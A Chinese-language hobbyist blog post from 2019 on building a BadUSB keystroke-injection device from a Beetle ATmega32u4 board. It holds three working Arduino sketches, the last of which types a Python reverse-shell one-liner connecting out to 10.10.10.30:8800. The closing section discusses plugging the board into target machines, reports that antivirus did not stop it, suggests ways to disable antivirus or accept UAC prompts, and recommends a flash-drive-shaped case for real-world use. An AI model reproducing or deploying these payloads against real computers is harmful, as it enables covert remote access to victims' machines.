序
板子用的beetle usb atmega32u4
自带usb接口,比较便宜,以前看过多款badusb的板子,但是都因为比较贵而放弃,直到前两天hx说了这个板子也可以,于是果断下单。
板子类型选择arduino leonardo,编译上传即可
上手试玩
代码很简单,一看就懂。
windows弹计算器
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <Keyboard.h>
void setup() {
// put your setup code here, to run once:
Keyboard.begin();
delay(2000);
Keyboard.press(KEY_LEFT_GUI);
delay(50);
Keyboard.press('r');
delay(50);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(50);
Keyboard.println("calc");
delay(50);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(50);
}
void loop() {
// put your main code here, to run repeatedly:
}
ubuntu 开终端
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <Keyboard.h>
void setup() {
// put your setup code here, to run once:
Keyboard.begin();
delay(2000);
/*
Keyboard.press(KEY_LEFT_CTRL);
delay(500);
Keyboard.press(KEY_LEFT_ALT);
delay(500);
Keyboard.press('T');
delay(500);
Keyboard.release('T');
*/
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.println("term");
delay(500);
Keyboard.press(KEY_RETURN);
delay(500);
Keyboard.release(KEY_RETURN);
Keyboard.println("echo hacked");
delay(500);
Keyboard.press(KEY_RETURN);
delay(500);
Keyboard.release(KEY_RETURN);
delay(50);
}
void loop() {
// put your main code here, to run repeatedly:
}
ubuntu反弹shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#include <Keyboard.h>
void setup() {
// put your setup code here, to run once:
Keyboard.begin();
delay(2000);
/*
Keyboard.press(KEY_LEFT_CTRL);
delay(500);
Keyboard.press(KEY_LEFT_ALT);
delay(500);
Keyboard.press('T');
delay(500);
Keyboard.release('T');
*/
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.println("term");
delay(500);
Keyboard.press(KEY_RETURN);
delay(500);
Keyboard.release(KEY_RETURN);
Keyboard.println("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.30\",8800));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'
");
delay(500);
Keyboard.press(KEY_RETURN);
delay(500);
Keyboard.release(KEY_RETURN);
delay(50);
}
void loop() {
// put your main code here, to run repeatedly:
}
跋
代码异常简单,执行过程也毫不隐蔽,难点在于如何把做好的板子插到目标设备上 :)
模拟的键盘设备,试过了5台电脑,其中三台win10有杀软,两台ubuntu,全部正常运行,没有遇到拦截的情况。
如果有恶意命令,可能会被拦截,似乎火绒会拦截命令行创建用户的命令
板子模拟键盘操作关掉杀软也是可以的 :) 然而暂时没想到如何用键盘快捷键关掉杀软。在执行过程中模拟点击允许该程序执行、同意UAC可能也是可以的。
淘宝上这款板子有的是带壳子的,外观就是一个普通的优盘。如果实战使用的话可能更好。
Les1ie
2019年8月7日09:35:43
